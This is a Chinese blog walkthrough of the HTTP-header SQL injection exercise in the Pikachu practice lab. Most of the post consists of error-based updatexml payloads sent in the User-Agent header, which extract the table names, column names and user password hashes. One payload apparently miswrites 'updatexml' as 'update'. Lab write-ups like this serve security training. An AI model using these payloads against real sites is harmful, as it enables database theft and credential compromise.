piakchu-‘http header’注入

最新推荐文章于 2024-05-18 12:04:29 发布
最新推荐文章于 2024-05-18 12:04:29 发布
阅读量1.8k 收藏 6
点赞数
文章标签: http 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339521/article/details/127590377
版权

http消息头是指,在超文本传输协议( Hypertext Transfer Protocol ,HTTP)的请求和响应消息中,协议头部分的那些组件。

http header 头信息可以获取客户端的一些信息,比如useragent、accept等字段,而且http消息头支持自定义。

首先打开pikachu靶机,我们先根据提示使用admin 123456 来登录,然后使用burpsuit进行抓包。

会发现,它可以知道我们的ip地址,以及使用什么浏览器访问,还有端口等信息。

所以大概可以判断是通过http header的头部来获取信息的,可以猜测是inser语句。

然后看下抓包内容。

1、判断注入点及类型

将user-agent后面内容改成1和1'进行测试。

可知user-agent处存在注入点,闭合为'。

2、查询数据库名

使用以下语句注入  

1' update(0,concat(0x7b,database()),1) or '

根据报错可知数据库名字为pikachu。

3、爆表名

使用以下语句注入

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31)),1) or '

 

因为上述并没显示完整,继续查询。

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31)),1) or '

最后一个拼接的字段为xssblind。

4、爆users表的字段名

使用以下语句,同理每次按照31的字长截取。

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),1) or '

 

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31)),1) or '

 

最后这里省略了其他的类似步骤,经过不断报错查询,可知username和password的字段。

5、爆users表的内容

最后爆数据,同样改变substr里的值就行。

' or updatexml(0,concat(0x7b,substr((select group_concat(username,':',password) from users),1,31)),1) or '

 

用同样的方法将数据不断爆出,最后这是采用MD5加密的密码,所以通过工具解下就可以了。

 

陳十一^_^
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
go-httpheader:Go库,用于将结构编码为Header字段
05-25
go-httpheader go-httpheader是一个Go库,用于将结构编码到Header字段。安装go get -u github.com/mozillazg/go-httpheader 用法 package mainimport ("fmt""net/http""github.com/mozillazg/go-httpheader")type ...
http header注入和宽字节注入
Williamanddog的博客
01-17 320
pikachuhttp header注入,cookie注入,宽字节注入
Pikachu靶场 “Http Header”SQL注入
感谢关注
12-23 713
2. 设置payload1 :在。设置payload2 :在。
5、HTTP header注入(详解)
最新发布
weixin_51520483的博客
05-18 1025
1、抓包要根据包信息和页面功能来判断内容是不是想要的,比如cookie内容2、payload选择要判断有一个已知内容为真,就可以用and或者or;判断不了就用or3、user-agent注入:因为它是作为一个整体字符串处理,你可以直接覆盖整个字段的值。4、cooke注入:因为它是解析为多个键值对,你需要确保你的 payload 完全覆盖特定键的值,或者设计你的 payload 使其在原有值基础上有效执行。
pikkachu的“http header注入
weixin_50339082的博客
06-18 641
pikkachu的“http header注入 一、原理 有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header 的sql注入漏洞。 二、实操 首先登陆 admin/123456 1.UA头 发现有对头部信息的获取,所以可能存在注入,抓包,发送到Repeater。
一文了解pikachu的SQL注入
allintao的博客
03-01 2670
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu SQL注入http注入
SS_liang的博客
01-12 499
这个界面给了两个提示,一个是UA头就是use agent另一个就是Accept头,这里我们就直接尝试在UA头进行测试:使用burp suite抓包:(这里有个插件比较方便,叫在火狐也可以安装)我这里只用bp给大家做示范,想用插件的可以去网上搜一下。这里OR是一个逻辑运算符,用于将两个或多个条件的任何一个满足的情况下返回true,这里可以使用and但是后面使用报错注入的时候and就不合适了。
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 791
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
Chrome插件:X-Forwarded-For Header
12-15
标题“Chrome插件:X-Forwarded-For Header”揭示了本文将深入探讨一个专门针对Google Chrome浏览器的扩展应用,该插件的主要功能是处理和设置HTTP的`X-Forwarded-For`字段。`X-Forwarded-For`(简称XFF)头是一...
http-signature-header
05-07
HTTP签名标头(http-signature-header) 一个用于创建和验证HTTP签名标头JavaScript库 目录 背景 安装 要在本地安装(用于开发): git clone https://github.com/digitalbazaar/http-signature-header.git cd ...
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标头 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
X-Forwarded-For Header-crx插件
04-02
此扩展名使您可以快速设置X-Forwarded-For HTTP标头 此扩展允许您快速更新X-Forwarded-For,X-Originating-IP,X-Remote-IP和X-Remote-Addr HTTP标头,以进行各种测试。 变更日志:v0.6.2-修复了干扰此扩展的Firefox...
pikachu~~~insert/update/delete,http注入
weixin_50339832的博客
05-30 740
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
基于Pikachu测试平台的http header注入
qq_43499389的博客
03-19 1519
http header注入 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)或者通过http header头信息获取客户端的一些信息,比如username、accept字段等等 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的SQL Inject漏洞 我们可以先在http header注入...
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1795
SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。
pikachu靶场(sql注入)(delete和http头部注入和盲注)
weixin_54431413的博客
03-16 3668
pikachu的盲注,delete和http头部注入
Http Header注入
qq_45680080的博客
11-03 720
什么是Http Header注入 一个SQL注入的场景: 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证) 或者通过http header头信息获取客户端的一些信息,比如客户端的IP地址、useragent、accept字段等等。 K会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑,则可能会导致基于http header的SQL...
pikachu靶场-4 SQL注入漏洞
weixin_52180702的博客
12-12 2188
既然在页面上只能判断真假,那么这个时候我们就可以对数据库里面的结果去按照刚才的方法去截取一个字符,转换成ASCII码然后去进行比较,只不过这个方式会很麻烦,因为盲注这种情况你没法通过页面上的返回来直接拿数据,你只能通过这种猜测的方式(真或者假)去一步一步猜测后面的数据,所以盲注如果要手工利用的话会非常的麻烦,非常的耗时间,我们在搞懂盲注原理的情况下,可以使用工具去进行自动化的测试。那就需要结合我们的经验和我们的想象了,多去做一些payload的测试,根据返回结果来判断我们是否打了。
实验14:Http Header注入演示
qq_44720671的博客
04-01 1251
Http Header注入演示 产生漏洞的原因: 有时,开发人员为验证客户信息(cookie)或用http header 获取客户信息(如:useragent、accept),会对http header 信息进行获取并使用sql进行处理,若安全措施没有做好,很有可能导致sql inject漏洞!!! 我们以Pikachu为例进行演示: 打开Pikachuhttp header注入,进行抓包,发...
pikachu靶场"http header"注入
07-27
Pikachu靶场是一个用于演示和测试Web应用程序安全漏洞的平台。HTTP header注入是一种常见的安全漏洞,它允许攻击者向HTTP请求的header注入恶意内容。这可能导致各种问题,包括信息泄露、会话劫持和远程代码执行。 在Pikachu靶场,你可以模拟HTTP header注入攻击,以便了解如何利用这种漏洞。你可以使用各种工具和技术来实施注入攻击,例如修改User-Agent、Referer或Cookie等header字段的内容。 但请注意,在真实的环境HTTP header注入是一种严重的安全威胁,攻击者可以利用它来获取敏感信息或执行恶意操作。因此,保护Web应用程序免受HTTP header注入攻击是非常重要的,开发人员应该采取适当的安全措施来防止此类漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值